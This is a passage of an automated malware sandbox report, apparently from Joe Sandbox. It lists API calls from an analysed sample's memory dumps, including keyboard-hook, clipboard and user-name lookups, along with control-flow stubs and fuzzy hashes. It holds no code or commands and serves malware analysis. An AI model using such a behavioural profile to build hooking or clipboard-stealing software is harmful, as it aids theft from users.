                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 5e4376f30d9c1d48a9aff209bedbf7cdb0c660a797ffc5f3cc4e964c2dbbce24
                                                                                                                                • Instruction ID: 856fcd1e992e807e593e12ac7fc8cbd13f36d8715f1b11c84580577c415a5313
                                                                                                                                • Opcode Fuzzy Hash: 5e4376f30d9c1d48a9aff209bedbf7cdb0c660a797ffc5f3cc4e964c2dbbce24
                                                                                                                                • Instruction Fuzzy Hash: FC6139B0C06359CFDB619F9AC58C39EBFF0BB18318F108519D46A67680D3785585CFA6
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E44
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E83
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5EEA
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E5F26
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5F60
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FA0
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 35094f0781f42f26cc4fc684098a10ed3b9a4cf83bc7aa1660bfa35cadca462f
                                                                                                                                • Instruction ID: dccd73b7aace79b2aaee611e012f5c909943a1d656c892fda2b525f5c2ef8b1d
                                                                                                                                • Opcode Fuzzy Hash: 35094f0781f42f26cc4fc684098a10ed3b9a4cf83bc7aa1660bfa35cadca462f
                                                                                                                                • Instruction Fuzzy Hash: CB5115B0C0635A8FDF218FA9D54879EBFF4BB28319F14850AE456A7A80C3785585CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5EEA
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E5F26
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5F60
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FA0
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 3e104980d4f14e4c340f620fbe2755469207aa7ff62945373cfccabe1fe32244
                                                                                                                                • Instruction ID: 8afdf231ad8779c86db23cfd8fdad3f6dfbc07e996b24fd04bcb339fa4ca44ca
                                                                                                                                • Opcode Fuzzy Hash: 3e104980d4f14e4c340f620fbe2755469207aa7ff62945373cfccabe1fe32244
                                                                                                                                • Instruction Fuzzy Hash: 24417BB0C063568BDF218FA9D5483AEBFF4BB24309F20451AE446A6B80C7785885CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:15.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0.6%
                                                                                                                                Total number of Nodes:474
                                                                                                                                Total number of Limit Nodes:58
                                                                                                                                execution_graph (rendered graph; the node and edge listing is not reproduced). API call nodes present in the graph: SetWindowsHookExA, LoadLibraryA, LoadLibraryExW, GetModuleHandleW, DuplicateHandle, DeleteFileW, GetUserNameW, KiUserCallbackDispatcher, OleInitialize, OleGetClipboard, CreateWindowExW, CallWindowProcW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId.

                                                                                                                                Control-flow Graph
                                                                                                                                control_flow_graph for the function at 123f53c-123f888 (rendered graph with executed / not executed blocks; block listing not reproduced). The only API call node is GetUserNameW in block 123f7e0-123f81b.
                                                                                                                                APIs
                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0123F80B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_1230000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                • Opcode ID: 48b26f9dac7cbdd91686140f00553bb87e7421ce023b96d0f9b9f92896892df1
                                                                                                                                • Instruction ID: cf5a2d18bd9b1e1ba346a61f82fbbd823060fefdc3fb241b0f38a90a533ce650
                                                                                                                                • Opcode Fuzzy Hash: 48b26f9dac7cbdd91686140f00553bb87e7421ce023b96d0f9b9f92896892df1
                                                                                                                                • Instruction Fuzzy Hash: 4A5135B4D10229CFDB18CFA9D989B9DBBF1BF88310F14811AE915AB350D7749844CF96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4667c866342f826c7ddfc9b6611b229df875ef6cc7a2056faeca1245b2cbd0c1
                                                                                                                                • Instruction ID: 3b2a8057c32004493dcee278675ef884a8c737bff2e851c176080dae1051e46a
                                                                                                                                • Opcode Fuzzy Hash: 4667c866342f826c7ddfc9b6611b229df875ef6cc7a2056faeca1245b2cbd0c1
                                                                                                                                • Instruction Fuzzy Hash: 97B16CB0E002488FDB54DFA9D984B9EBBF1FF88314F14C16AE808AB351D7749944CBA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06C47AB8
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 06C47AF5
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06C47B32
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06C47B8B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 26ace720c441c1648d34b0df23abdcafc145ce5ddfde7b7831b1956f024e179a
                                                                                                                                • Instruction ID: 9d5633ccf068b5347111a3d3ef1ba9f16f812df5bd34c8c877d4d4a2315784b5
                                                                                                                                • Opcode Fuzzy Hash: 26ace720c441c1648d34b0df23abdcafc145ce5ddfde7b7831b1956f024e179a
                                                                                                                                • Instruction Fuzzy Hash: 145163B09007488FDB50DFAAC948B9EBFF1AF48314F208559E459A7290DB789944CF79
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph
                                                                                                                                control_flow_graph for the function at 6980040-6980688 (rendered graph with executed / not executed blocks; block listing not reproduced). The only API call node is OleInitialize in block 69805ea-6980662.
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6980000_file.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: f8af75c839c1f0ad9f7a2aa0d468f40a708cbb2ffa5c95a1a8cc29489528bb5c
• Instruction ID: b5ffa7d96c73ef32ef3a7d567d0a11ccf4712ad2caeefc1535ba08ac58242511
• Opcode Fuzzy Hash: f8af75c839c1f0ad9f7a2aa0d468f40a708cbb2ffa5c95a1a8cc29489528bb5c
• Instruction Fuzzy Hash: F3125630A002448FCBA4EFA8C544B6DBBF6EF84354F25C4A9D41AAB651DB75EC49CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 698d7cf-698d7d8, final block 698da90-698daad; LoadLibraryExW is called from block 698da58-698da87; internal calls to 6c418a0, 6c4186f, 698d7cf, 698d9b0, 698c9f0, 698634c, 6988d2c, 698ca00, 698ca10 and 698ca1c.]
Memory Dump Source
• Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6980000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 98942c1e17b41b98b7381bf72baa76c79c20278a44d12ba9da27977764b8b1c0
• Instruction ID: 1285f22e88f8a0acdf43264247fadd70f5b53540635a003705fa8d2e1f788f95
• Opcode Fuzzy Hash: 98942c1e17b41b98b7381bf72baa76c79c20278a44d12ba9da27977764b8b1c0
• Instruction Fuzzy Hash: C4816B70A007059FD7A4EF2AD45076ABBF5BF88310F10892EE45AD7B80DB75E809CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 123f6c4-123f72f, final block 123f888 (self-loop); GetUserNameW is called from block 123f7e0-123f81b.]
APIs
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 0123F80B
Memory Dump Source
• Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1230000_file.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 3fc8fe4bf53069fa0b97da4e6408c2c2fd22e29524cafae5a3292093bc190ea8
• Instruction ID: 6c5737ad77ab2809e342c3f358355cdcaa9c0f05d88d03de1ea05d4b0ddd4482
• Opcode Fuzzy Hash: 3fc8fe4bf53069fa0b97da4e6408c2c2fd22e29524cafae5a3292093bc190ea8
• Instruction Fuzzy Hash: A55143B0D102298FDB18CFA9D985B9EBBB1BF88314F14811AE915BB390D7749844CF96
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 123f554-123f72f, final block 123f888 (self-loop); GetUserNameW is called from block 123f7e0-123f81b.]
APIs
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 0123F80B
Memory Dump Source
• Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1230000_file.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: c5d4d743bb9f60e92d3f75a1416982991a16ecdc2323c42a8c544015ff080340
• Instruction ID: 9dabdeb991bbca2542d9b2fa7b4b09e6e57994dbecf71e27307655d77a961be0
• Opcode Fuzzy Hash: c5d4d743bb9f60e92d3f75a1416982991a16ecdc2323c42a8c544015ff080340
• Instruction Fuzzy Hash: BB5135B0D102298FDB18CFA9D985B9DBBF1BF88310F14811AE915BB350D7749844CF96
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 6c44a4d-6c44a56, final block 6c44bc9 (self-loop); CreateWindowExW is called from block 6c44b1b-6c44b7a.]
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C44B6A
Memory Dump Source
• Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6c40000_file.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: ce3ff035f222831388b3b8670519ee89a59e1602f093aa4c6992076947a8a63c
• Instruction ID: bd6a21eb55116d024e33a59b388ebe1c2170aae20f1cca6e87cdbcb0765a8f28
• Opcode Fuzzy Hash: ce3ff035f222831388b3b8670519ee89a59e1602f093aa4c6992076947a8a63c
• Instruction Fuzzy Hash: D751BDB1D006499FDB14DF9AC884ADEBBF5FF48310F24822AE819AB210D7749945CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 6c44a58-6c44abe, final block 6c44bc9 (self-loop); CreateWindowExW is called from block 6c44adb-6c44b7a.]
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C44B6A
Memory Dump Source
• Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6c40000_file.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 7d4cf337ef2ead5a13d108236888561fce5448fe068a186b90f7094bb43d0fe8
• Instruction ID: bec5399656a06d3564992df20a4a11feb45fe48ccf8b3e22643cfecea1cd8aa1
• Opcode Fuzzy Hash: 7d4cf337ef2ead5a13d108236888561fce5448fe068a186b90f7094bb43d0fe8
• Instruction Fuzzy Hash: 0141BDB1D003499FDB14CF9AC884ADEBBF5FF48310F24822AE819AB250D7749985CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 12375e5-12375ee, final block 1237732 (self-loop); LoadLibraryA is called from block 123769b-12376e7.]
APIs
• LoadLibraryA.KERNELBASE(?), ref: 012376D7
Memory Dump Source
• Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1230000_file.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 4f96fc5ffb0f9c54c75083757c778bcadc3031e8ec920b7a72daa4960523ec12
• Instruction ID: 67c8738df5a884e5abcf55fb9bbcd47e378f8741a7796cd890757566f0752acc
• Opcode Fuzzy Hash: 4f96fc5ffb0f9c54c75083757c778bcadc3031e8ec920b7a72daa4960523ec12
• Instruction Fuzzy Hash: DD4155B0D10659DFDF14CFA9C88478EBBF1EB88314F108129E905AB384D7B49886CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 6c4763c-6c48c54, final block 6c48d27-6c48d34; CallWindowProcW is called from block 6c48cb2-6c48cea; internal call to 6c42350 from block 6c48d04-6c48d24.]
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 06C48CD9
Memory Dump Source
• Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6c40000_file.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: e082e6eccf5e4d44349a5d318c53f5d9b44b73207f9ad98cdaa4f8935617eb4d
• Instruction ID: 774533f6e7ac2c7ba1bca3b705288750a515981c97451304013ceb587c60c0e8
• Opcode Fuzzy Hash: e082e6eccf5e4d44349a5d318c53f5d9b44b73207f9ad98cdaa4f8935617eb4d
• Instruction Fuzzy Hash: DC416CB4A01309CFCB50DF9AC488AAABBF5FF88314F248549E559A7321D734E941CFA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image; executed/not-executed colouring not recoverable. Recoverable from the graph data: entry block 1234954-1237647, final block 1237732 (self-loop); LoadLibraryA is called from block 123769b-12376e7.]
APIs
• LoadLibraryA.KERNELBASE(?), ref: 012376D7
Memory Dump Source
• Source File: 00000004.00000002.613890811.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1230000_file.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: aba35ade4cfb2e55ebbca74255fcf91bab4b722c97444f5dacb2077a9512f5af
• Instruction ID: 666066f5878cf6fc96e739e3fc0c130591e6e0d17fdcd74ac65553755a5ed67b
• Opcode Fuzzy Hash: aba35ade4cfb2e55ebbca74255fcf91bab4b722c97444f5dacb2077a9512f5af
• Instruction Fuzzy Hash: 4E4156B0D106598FDF14CFADC88479EBBF1EB88314F148129E815AB384D7B49845CF91
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 1974 698073c-69807e0 OleGetClipboard 1976 69807e9-6980837 1974->1976 1977 69807e2-69807e8 1974->1977 1982 6980839-698083d 1976->1982 1983 6980847 1976->1983 1977->1976 1982->1983 1984 698083f 1982->1984 1985 6980848 1983->1985 1984->1983 1985->1985
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: 8dc090a49ed3e05f411968a1477755e9eb939856ed54fc9f74f1116e46489ef8
                                                                                                                                • Instruction ID: 15d25e56242887dbde544b0bd67040aa08611d9bf4c9d9790ab59c27c8b6a3b7
                                                                                                                                • Opcode Fuzzy Hash: 8dc090a49ed3e05f411968a1477755e9eb939856ed54fc9f74f1116e46489ef8
                                                                                                                                • Instruction Fuzzy Hash: FA31E1B0E01258DFDB50DF99C984BDEBFF5AB48314F248019E008BB694D7759989CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 1986 6980748-69807e0 OleGetClipboard 1988 69807e9-6980837 1986->1988 1989 69807e2-69807e8 1986->1989 1994 6980839-698083d 1988->1994 1995 6980847 1988->1995 1989->1988 1994->1995 1996 698083f 1994->1996 1997 6980848 1995->1997 1996->1995 1997->1997
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: 899dbd7abcaba2b37fc0396e68ab7b0f086b3179abb3293b44b562df09731fed
                                                                                                                                • Instruction ID: b8605fbb270f5a42a530eed8519e6fb446bf86eafaf196e2efd040c2d3146b65
                                                                                                                                • Opcode Fuzzy Hash: 899dbd7abcaba2b37fc0396e68ab7b0f086b3179abb3293b44b562df09731fed
                                                                                                                                • Instruction Fuzzy Hash: F131E1B0D01248DFDB50DF99C984BCEBBF5AF48314F248019E404BB794D775A989CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06C47D07
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 0e1929928d33ed204f686eba0e8f01b5e61b7a1fdd281ecef2501f6304b0e022
                                                                                                                                • Instruction ID: 9852ddc2af1c1a07d3e7f934d97793a2e26bdaed52e4bfab589d657a3812ac27
                                                                                                                                • Opcode Fuzzy Hash: 0e1929928d33ed204f686eba0e8f01b5e61b7a1fdd281ecef2501f6304b0e022
                                                                                                                                • Instruction Fuzzy Hash: 4521E9B5D002499FDB10CF9AD984ADEBFF8FB48324F14845AE955A3310D374A944CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 1998 6c42298-6c422a2 2000 6c422a4 1998->2000 2001 6c422a9-6c451ea 1998->2001 2000->2001 2004 6c451f2-6c4521d DeleteFileW 2001->2004 2005 6c451ec-6c451ef 2001->2005 2006 6c45226-6c4524e 2004->2006 2007 6c4521f-6c45225 2004->2007 2005->2004 2007->2006
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06C45210
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 5db3359da87c026512ba373c08522d7cfbbe7ca53f3fb949b0ce60aac688aa51
                                                                                                                                • Instruction ID: bfb93f2b88117cd3d196c6fb1b84676605fab6ef292bd663aebee24680caee23
                                                                                                                                • Opcode Fuzzy Hash: 5db3359da87c026512ba373c08522d7cfbbe7ca53f3fb949b0ce60aac688aa51
                                                                                                                                • Instruction Fuzzy Hash: 802159B2C006598BCB10DF9AC4447DEBBF4EF48324F14816AE815A7740D738AA44CFE5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06C47D07
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 7b41d535bf092f9559db2fa26a790140f0da836dbc3c49d53e4d3c6496e6f249
                                                                                                                                • Instruction ID: 52111d2ff1618ebc6671effeca630e57a330824f1a56ec1e3d63600c3323015c
                                                                                                                                • Opcode Fuzzy Hash: 7b41d535bf092f9559db2fa26a790140f0da836dbc3c49d53e4d3c6496e6f249
                                                                                                                                • Instruction Fuzzy Hash: 1A21E4B5D002499FDB10CF9AD984ADEBFF8EB48324F14841AE914A3310D378A944CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069830D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6980000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HookWindows
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2559412058-0
                                                                                                                                • Opcode ID: 2f2c56ab2ca091bc292fbd8a307d6d39868ed06b66c3810b1004c035293e07bf
                                                                                                                                • Instruction ID: 2268c47d6bb1be758bef560d9d6bbed11f237529b0d4056842c0c28e2f51cfe8
                                                                                                                                • Opcode Fuzzy Hash: 2f2c56ab2ca091bc292fbd8a307d6d39868ed06b66c3810b1004c035293e07bf
                                                                                                                                • Instruction Fuzzy Hash: 2A213875D002099FCB50DF9AD844BEEFBF5EF88320F10842AE459A7650CB74A944CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06C41906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: ff5bbb6f8aae8c94e01d733aecd662ad4e564207999aab8de720aab1d14ce028
                                                                                                                                • Instruction ID: afb7233b60f81bc4cece86c9b9f0c0300abdc1c62409bdb4b76151846a340d04
                                                                                                                                • Opcode Fuzzy Hash: ff5bbb6f8aae8c94e01d733aecd662ad4e564207999aab8de720aab1d14ce028
                                                                                                                                • Instruction Fuzzy Hash: 582189B1C043888FCB11DFAAC80469EBFF4AF8A314F14849ED494A7652D3386545CFA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06C45210
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 8f83c96cf1f721841901a99b7c8f8ac82fab9f688bd8286b320bcf9f16e15cc9
                                                                                                                                • Instruction ID: 1a8f6e0846686b926be062fe6f4430c1f2e8438a416948eae8a637bb011f1491
                                                                                                                                • Opcode Fuzzy Hash: 8f83c96cf1f721841901a99b7c8f8ac82fab9f688bd8286b320bcf9f16e15cc9
                                                                                                                                • Instruction Fuzzy Hash: BE2115B6C006599BCB10DF9AC4447AEFBF4FB48320F54816AE818B7640D778AA44CFE5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06C45210
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656987891.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_6c40000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 73c68933a0edb89b1a6350a8fc60fceaeeba8d77fbf48fcb86a63e1e1414d565
                                                                                                                                • Instruction ID: cee562c9382e21ce0ab112f1580c88b0946fdf0e10c3b8eede17a93a3fa40beb
                                                                                                                                • Opcode Fuzzy Hash: 73c68933a0edb89b1a6350a8fc60fceaeeba8d77fbf48fcb86a63e1e1414d565
                                                                                                                                • Instruction Fuzzy Hash: 892127B2C006599BCB10DF9AD4447DEFBB4FB48324F14812AE858B7640D738AA44CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 069830D3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.656232158.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
